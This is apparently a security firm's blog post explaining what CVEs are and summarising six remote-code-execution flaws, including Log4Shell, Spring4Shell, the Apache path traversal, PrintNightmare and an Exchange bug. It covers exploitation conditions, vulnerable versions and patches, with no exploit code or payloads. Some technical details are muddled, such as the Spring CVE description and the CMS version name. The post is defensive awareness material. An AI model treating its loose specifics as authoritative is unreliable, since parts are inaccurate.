Introduction
Every day of every month, a large number of security vulnerabilities are reported, many of which can have serious consequences for your applications, websites, and network infrastructures, with many of them leading to Remote Code Execution, such as the log4j vulnerability. In this blog post, we’ll go over a few of the vulnerabilities that are routinely abused in the company and have the potential to take over the entire organization if exploited successfully. If you are developing applications or doing a penetration test for a business, you may come across one of these vulnerabilities.
What is a CVE?
|
| Source ondeso |
Suppose, researchers were able to find a few different vulnerabilities associated with an application app1 which might be open source or might be affecting a lot of different users in 2020,2021, and 2022. How do you think I will be able to explain to you what the vulnerabilities are, what are the conditions required to exploit them and their exploit code (if available). I can’t simply say that it was found in 2020 or 2021. There were a lot discovered during those years. This is why we have CVE.
CVEs stand for Common Vulnerabilities and Exposures. As per its common definition, “it is a list of publicly disclosed computer security flaws.” It is maintained by the MITRE Corporation and when we refer to a CVE, we generally associate it with a number.
For example, if there were a total of 4 vulnerabilities found in the year 1999, we could write them as CVE-1999–1, CVE-1999–2, CVE-1999–3, CVE-1999–4. Only those vulnerabilities are awarded a CVE number if they have the potential to affect a large number of websites or internet users. Assume you are reporting cross-site scripting (XSS) to a certain website, and that XSS is only being executed on that specific website. As a result, this cannot be added to CVE; however, if you discovered an XSS in the JavaScript library, which is used by a large number of websites, the XSS will affect a large number of websites and will require adequate tracking in the future; as a result, we will give a CVE to it.
1. Log4j 2021–44228
Apache Log4j is a logging software written in Java that is developed by the Apache Software Foundation. It is written in Java and is a package that can be found in the Java logging systems. It is included in a number of different Java Logging Frameworks. A zero-day vulnerability has been identified in the Java logging package log4j, which has the potential to allow for remote code execution.
Logging libraries often write down messages to a log file or a database. Before a string is written to a log file, it is typically processed. For example, variables specified as $variable can be expanded as date, time, or username. The ${user.username} expression can be changed with the current user’s actual username by using an expression such as Log.info(“${user.username} not found”). This is analogous to the use of $() in PowerShell to expand and parse text.
Some of the common Headers that a most of the website usually logs are such as User-Agent or custom headers like X-Forwarded-For, etc. There are also some conditions in which the application is writing user’s information in the logs such as email, their names etc for the log tracking and if you add the payload in those it can be exploited as well.
The exploit scripts are already available online and the easiest way to prevent log4jshell is to update to Log4j version 2.16.0 or higher.
2. Spring Shell CVE-2022–22965
Informally known as Spring Framework, the Spring Framework is an open-source application framework that provides infrastructure support for the development of Java-based web applications. In March of 2022, two remote code execution vulnerabilities in this framework were identified. A component in the framework known as “Spring Cloud Functions” is vulnerable to the first vulnerability, which affects a component in “Spring Core,” which is also known as the “heart” of the framework.
For a server to become vulnerable to this issue, a lot of things need to fall in the right place.
For example, JDK 9+ needs to be installed on the server, with a vulnerable version of the Spring Framework running, and Apache Tomcat being run as a server. The Vulnerable Versions of the Spring Framework are versions until 5.2, 5.2.0 to 5.2.19 and from 5.3.0 to 5.3.17
It is incredibly easy to exploit this vulnerability and the exploit code is also available online. If the web application made using this framework was being run as root or Administrator, this could lead the attacker to gain administrative privileges on the web server.
3. LFI and RCE in Apache CVE-2021–41773 and CVE-2021–42013
Apache version 2.4.49, which was released in 2021, was vulnerable to a Local File Inclusion vulnerability, which might result in remote code execution. It was assigned the CVE number 2021–41773, and the company quickly released a patch in the more recent version 2.4.50. However, it was discovered that the updated version was also vulnerable to the same weakness, and that all a user had to do was encode his payload twice to circumvent the problem. This was assigned the CVE number 2021–42013. They were quick to produce another update, which fortunately contained a fix for these vulnerabilities.
Because Apache is used by a large number of web applications, these vulnerabilities were widely exploited in the wild by attackers. The exploit can be found on the internet.
The remediation was to update it to 2.4.51
4. Windows Print Spooler Remote Code Execution Vulnerability CVE-2021–34527
This is one of the vulnerabilities that was and still heavily exploited by the attackers.
In computing, a printer spooler is a simple program that manages the paper printing tasks that are sent from the computer to a printer or print server. A print queue or a buffer, where multiple print jobs can be stored until they are retrieved by the printer or print server, is enabled.
A printer spooler is used when a large number of print jobs are supplied to a single printer. Computer printers are notoriously slow when it comes to printing, thus other print jobs are placed in a buffer or print queue to save time. When the printer is ready for the next job or document, it gets any pending print jobs from the print queue and prints them one at a time until all of the documents are finished printing.
It turns out, an attacker can use Print Spooler to perform privileged commands on the system. This occurs when the Windows Print Spooler service improperly performs privileged file operations. An attacker can use this vulnerability to install programs, view, change, or delete data, and even create new accounts with full Admin/System rights.
Since its exploit code became publicly available, its exploitation increased exponentially.
Ensure that your server is up-to-date with the latest patches.
5. Microsoft Exchange Server Remote Code Execution Vulnerability CVE-2021–26855
Microsoft Exchange Server is a mail server and is Microsoft’s email, calendaring, contact, scheduling and collaboration platform. It runs exclusively on Windows Server Operating Systems.
This attack requires a malicious user to make an untrusted connection to Exchange server port 443. This can also be triggered if an attacker can make an administrator open a malicious file. The administrators are recommended to install updates on the Windows Servers that are externally facing.
6. Baigo CMS v3.0-alpine-2 CVE-2022–26607
Baigo is a Content Management System written in PHP. A remote code execution vulnerability was found in Baigo CMS v3.0-alpine-2 which allows unrestricted file upload When a maliciously crafted PHP file is uploaded on to the CMS. The technical details of the exploit and the vulnerable function(s) aren’t available at the moment.
As the exploit isn’t currently exploited, there is a demand for the exploit in the market. As of this webpage, its exploit could be priced between $0 to $5000.
Conclusion
In this blog article, we discussed some of the most commonly targeted services and applications on the internet. All the vulnerabilities that are discussed already have a CVE assigned and their exploit is available online, with the exception of Baigo, which has not yet been publicly disclosed due to an exploit being kept under wraps. In addition to these, there are other others on the list that we will learn about in subsequent blogs.
Credit Source: Security Lit Limited
